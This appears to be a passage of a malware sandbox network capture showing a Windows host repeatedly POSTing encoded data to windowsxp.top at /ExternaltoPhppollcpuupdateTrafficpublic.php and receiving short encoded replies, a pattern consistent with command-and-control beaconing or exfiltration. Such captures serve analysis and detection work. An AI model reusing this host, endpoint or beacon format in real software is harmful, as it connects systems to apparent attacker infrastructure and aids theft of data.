                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:21.413763046 CET1012OUTData Raw: 50 51 58 5e 5e 58 56 51 54 58 57 54 54 52 5b 5f 59 5a 5b 5b 52 52 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQX^^XVQTXWTTR[_YZ[[RRRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y'-(":&57.403;#8-<W),;7!/^;_=&.!Y##X(
                                                                                                                  Oct 27, 2024 19:24:21.634764910 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:21.851717949 CET785INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:21 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yYxlVg33Z5n%2FzRMU%2FI59KVkr63g%2BQgIv%2F0sdlsE6L1cRcYAK2iw62PAaSOUM9TukRRcRa%2FXv%2FtS0N%2FWynD35spk9v5NING01NJzjClL1%2FbKkCMi38J0Sa7z%2FKC%2FmNn8J"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8f6df440be8-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1614&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=906132&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  108192.168.2.450121188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:21.992827892 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:22.337152004 CET1012OUTData Raw: 55 53 58 59 5b 58 56 53 54 58 57 54 54 54 5b 52 59 51 5b 5e 52 51 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USXY[XVSTXWTTT[RYQ[^RQR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'X%>'""54,$43^<U;>/)(W""//8*/6Z-/!Y##X('
                                                                                                                  Oct 27, 2024 19:24:22.589334011 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:22.894195080 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:22 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJfIYwXjir8afBGmwW2SW9xzkA5KFhd3UKWhPifvNZbu7AS6iJoGWJFHJhGkK%2F8wunbsrP7nv4NRI%2FcCkcf3K%2FqNt9qB3iR74EFtbDQfKJso7RpSralJ0mcB1dPYwWpD"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b8fccc18ea0a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1291&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1117283&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  109192.168.2.450122188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:23.034926891 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:23.388482094 CET1012OUTData Raw: 50 51 5d 5c 5e 53 53 54 54 58 57 54 54 50 5b 52 59 5e 5b 5e 52 53 52 5f 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQ]\^SSTTXWTTP[RY^[^RSR_T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z&=759=X6<_:'( V/ (?$ ! /[()?:^,/!Y##X(7
                                                                                                                  Oct 27, 2024 19:24:23.624043941 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:23.918884039 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:23 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FZiURlQgQaRnMJsgjHudPOBmCnfLbg8ka6BKv1YA6LHqewlDBMPQZeFlF%2FXLuX%2FdRkhmWOVgU4Il9hAZMAF3frOqd52Rs1bdoLbSH0VIlan0BV5DLNsIkwNgS2vO34d0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b903492d2d4a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1153&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1299820&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  110192.168.2.450123188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:24.044559002 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:24.399300098 CET1012OUTData Raw: 55 55 5d 59 5e 59 56 5e 54 58 57 54 54 53 5b 5a 59 59 5b 51 52 55 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UU]Y^YV^TXWTTS[ZYY[QRUR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'\%>769)"$[.B<X0+(/S*,$W 2'Z->'="_:!Y##X(;
                                                                                                                  Oct 27, 2024 19:24:24.640912056 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:24.831068039 CET765INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:24 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3JbsaAhORgz9u0EADjrVh8KiJwSl4wkxSUySibYkcD%2BEvKtjzyuQhpcS79oJjxSgSBAeJ6m6iUUiFXGVFSH8Y8lEZ8kNphkLEL7POx5T2WEsL9CJMl3%2FXbc8wSDc46Bx"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b90999238d29-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1272407&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:24:24.831273079 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  111192.168.2.450124188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:24.963299990 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:25.321954966 CET1012OUTData Raw: 50 55 58 5a 5e 53 53 55 54 58 57 54 54 5d 5b 58 59 5f 5b 58 52 54 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUXZ^SSUTXWTT][XY_[XRTRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z%,!*\#549<]'(';(=?'##Y,;X*?69!Y##X(
                                                                                                                  Oct 27, 2024 19:24:25.590050936 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:25.794980049 CET780INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:25 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1kYknNZY9OJL1wiMKuUOo%2FQ2KhPPJ33o%2FrKxLb%2BcbgriWskb%2Fs%2FjKdu4ZOYOXJG5gZsHd9Dw%2FeYs09gDKD2yWh8duXntMQJZmljY%2BuVQobX0Ct5AjJcDXpQZ7PvBHtMX"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b90f89c72e19-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1386&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1065489&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  112192.168.2.450125188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:25.407706022 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:25.758858919 CET1716OUTData Raw: 50 50 5d 5b 5e 5e 56 50 54 58 57 54 54 5d 5b 53 59 50 5b 5c 52 53 52 5d 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PP][^^VPTXWTT][SYP[\RSR]T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$&?!9666#.40^'U;#>? P418/#Y?,&9!Y##X(
                                                                                                                  Oct 27, 2024 19:24:26.003123999 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:26.204607010 CET923INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8IVAK6hdb82MO8uA%2Barb2ep1c87ewkP6Up5nQ%2FQ3L615pxbqOZ%2F9SFmDB0aFX1W7RJiJJVIZq5pE9%2BKk5h8jrrqniQbI3tJHEt643vIXmStVIa35rIES1cvijDLMNFVH"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9122e016c1a-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1147&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1309222&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 22 17 20 3e 0e 1f 3e 02 21 57 29 0f 2e 06 33 3c 29 13 3b 31 2c 5b 29 03 3e 0f 2e 01 26 50 27 24 36 1a 3c 2a 23 01 23 00 24 56 3d 35 21 5e 00 1c 24 07 20 2e 31 52 25 28 2c 5c 24 1e 0e 5c 36 2d 3b 5c 2a 10 22 0f 3c 17 0a 12 3f 06 24 0c 2c 59 22 08 25 00 39 07 2c 5e 22 10 3c 2a 2a 54 0c 14 22 02 39 01 30 12 22 0f 29 54 2a 21 28 5b 26 3e 3c 57 27 04 0e 1d 3c 02 05 5d 3f 03 39 1f 22 3f 34 10 3c 5e 35 03 33 3d 2c 05 2b 3e 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98" >>!W).3<);1,[)>.&P'$6<*##$V=5!^$ .1R%(,\$\6-;\*"<?$,Y"%9,^"<**T"90")T*!([&><W'<]?9"?4<^53=,+>"T")S0YP0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  113192.168.2.450126188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:25.920197964 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:26.274313927 CET1008OUTData Raw: 55 53 58 5c 5b 59 53 54 54 58 57 54 54 55 5b 5e 59 5f 5b 58 52 53 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: USX\[YSTTXWTTU[^Y_[XRSRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$'-3 9"56/,$,3^;, T)/8P T;[8#Y>,6:!Y##X(3
                                                                                                                  Oct 27, 2024 19:24:26.506963968 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:26.818957090 CET772INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:26 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CSpMvc7X8Zpl3%2FDBbHUlZFRP5n3C7u6ea9SxUYwIwBL1lAJWIcV4JhV1i2TjyhQsHXE3Rp9mIjpsZs%2Bx7EiAB3LaubCJEkTRzcmgCa%2Fhr4w0bfZII88Mseh5Fw4FESvE"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b9154f986b94-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1371212&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  114192.168.2.450127188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:26.949157953 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:27.306215048 CET1012OUTData Raw: 55 56 58 55 5e 5d 53 57 54 58 57 54 54 56 5b 5c 59 58 5b 5f 52 54 52 58 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UVXU^]SWTXWTTV[\YX[_RTRXT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']1X 69)]"6:$,$8#,8S>< 7";Z;[+_)"X9!Y##X(/
                                                                                                                  Oct 27, 2024 19:24:27.544910908 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:27.739195108 CET782INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:27 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vLBB9CmkKQBHdGUxG%2FPHkPzj%2B%2FgzxthjlHj7RWeQoxD8XEieQ1UF0GXJ8GPUjd5jX%2BTxWQU4pRAu3Q0i7xQU%2FcGqOrwCwkvCV09A0%2BASeK%2FzCllM%2BCB9XoOAgpSH7COZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b91bcec66b3c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1271&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1210702&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  115192.168.2.450128188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:27.877024889 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:24:28.227422953 CET1008OUTData Raw: 50 51 58 58 5e 5c 53 52 54 58 57 54 54 55 5b 58 59 51 5b 58 52 5e 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PQXX^\SRTXWTTU[XYQ[XR^R^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Z10!)5#6Z-B ]$(3,.(/8P##Z8-Y?<.Y9?!Y##X(+
                                                                                                                  Oct 27, 2024 19:24:28.502160072 CET25INHTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:24:28.815150023 CET774INHTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:24:28 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XS0aocY6NnK05zDwUBSSwvUDKhCHOep%2B%2F6VAfL3MHUZ2zezQgOmcX1OUa1qET1a01CgmT%2BpTxin8fVofoTrceelsUGNq%2BGfR7soTaIvwGpokzX2MFZ8NlCA6V51M5cd8"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b921cb946b43-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1275&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1245055&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                  116192.168.2.450129188.114.97.380
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Oct 27, 2024 19:24:28.953830004 CET321OUTPOST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
